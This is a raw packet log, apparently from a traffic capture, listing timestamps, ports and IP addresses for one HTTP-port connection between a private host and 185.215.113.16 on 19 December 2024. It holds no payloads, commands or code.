Dec 19, 2024 10:10:23.452708960 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.452737093 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.452938080 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.452938080 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.453008890 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.453036070 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.453054905 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.453066111 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.453619003 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.453639030 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.453665018 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.453676939 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.454200983 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.454243898 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.454437017 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.454474926 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.455148935 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.455190897 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.455281973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.455327988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.455881119 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.455920935 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.456113100 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.456152916 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.456762075 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.456804991 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.456878901 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.456918001 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.457695007 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.457736015 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.457839966 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.457881927 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.458450079 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.458492041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.458583117 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.458621025 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.459742069 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.459758997 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.459784985 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.459800959 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.460625887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.460643053 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.460669994 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.460683107 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.461504936 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.461522102 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.461545944 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.461574078 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.462019920 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.462066889 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.462141037 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.462181091 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.462975025 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.463023901 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.463051081 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.463092089 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.463869095 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.463907957 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.463921070 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.463965893 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.464736938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.464782000 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.464818954 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.464859962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.465569019 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.465626001 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.465703011 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.465744019 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.466451883 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.466507912 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.466536045 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.466578007 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.467483044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.467534065 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.467546940 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.467588902 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.468221903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.468269110 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.468380928 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.468425035 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.469160080 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.469218016 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.469245911 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.469288111 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.470005035 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.470074892 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.470108986 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.470156908 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.470896006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.470953941 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.471004009 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.471054077 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.471878052 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.471939087 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.471966028 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.472018003 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.472692966 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.472745895 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.472755909 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.472804070 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.473556042 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.473613024 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.473690987 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.473742962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.474503994 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.474560022 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.474631071 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.474684000 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.475351095 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.475409985 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.475435972 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.475485086 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.476231098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.476284981 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.476387978 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.476437092 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.477262974 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.477314949 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.477421999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.477463007 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.478192091 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.478236914 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.478375912 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.478416920 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.478984118 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.479023933 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.479124069 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.479162931 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.479782104 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.479824066 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.479891062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.479929924 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.480705976 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.480747938 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.480829000 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.480870962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.481719971 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.481770992 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.481786966 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.481829882 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.482511044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.482556105 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.482588053 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.482631922 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.483470917 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.483511925 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.483604908 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.483644009 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.484411001 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.484463930 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.484581947 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.484627962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.485256910 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.485281944 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.485307932 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.485321045 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.486031055 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.486077070 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.486155033 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.486196995 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.486922979 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.486974955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.487171888 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.487219095 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.487888098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.487912893 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.487946033 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.487963915 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.488734007 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.488787889 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.488995075 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.489042044 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.489624977 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.489675045 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.489784956 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.489833117 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.490561008 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.490607023 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.490693092 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.490736961 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.491415024 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.491458893 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.491489887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.491534948 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.492377996 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.492393970 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.492424011 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.492448092 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.493208885 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.493256092 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.493273973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.493316889 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.494205952 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.494251013 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.494311094 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.494354963 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.495284081 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.495327950 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.495412111 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.495455027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.496088028 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.496133089 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.496285915 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.496330023 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.497028112 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.497071028 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.497082949 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.497133017 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.497901917 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.497944117 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.498060942 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.498102903 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.498789072 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.498841047 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.645836115 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.646034956 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.646130085 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.646152020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.646171093 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.646186113 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.646203041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.646229982 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.646832943 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.646879911 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.646998882 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.647047043 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.647774935 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.647823095 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.647854090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.647898912 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.648569107 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.648619890 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.648699045 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.648747921 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.649530888 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.649589062 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.649612904 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.649653912 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.650331020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.650374889 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.650438070 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.650480986 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.651103020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.651149988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.651222944 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.651268005 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.651977062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.652020931 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.652204990 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.652249098 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.652803898 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.652851105 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.652915001 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.652956963 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.653737068 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.653783083 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.653815985 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.653857946 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.654472113 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.654524088 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.654558897 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.654602051 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.655381918 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.655425072 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.655527115 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.655566931 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.656337023 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.656383038 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.656411886 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.656450987 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.657392025 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.657438040 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.657502890 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.657550097 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.658616066 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.658670902 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.658699036 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.658737898 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.659496069 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.659543037 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.659648895 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.659689903 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.660224915 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.660279989 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.660350084 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.660397053 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.661238909 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.661298990 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.661360025 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.661406040 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.661997080 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.662055016 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.662081957 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.662127972 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.662777901 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.662830114 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.662857056 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.662898064 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.663635015 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.663691998 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.663742065 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.663784027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.664305925 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.664335012 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.664355993 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.664371967 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.664938927 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.664982080 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.665003061 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.665045977 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.665585995 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.665627003 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.665658951 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.665700912 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.666340113 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.666385889 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.666435957 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.666479111 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.667058945 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.667100906 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.667180061 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.667222023 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.668195009 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.668239117 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.668308020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.668349028 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.669164896 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.669203997 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.669230938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.669270992 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.669903040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.669948101 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.670070887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.670111895 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.671067953 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.671222925 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.671253920 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.671300888 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.671969891 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.672020912 CET	49881	80	192.168.2.6	185.215.113.16
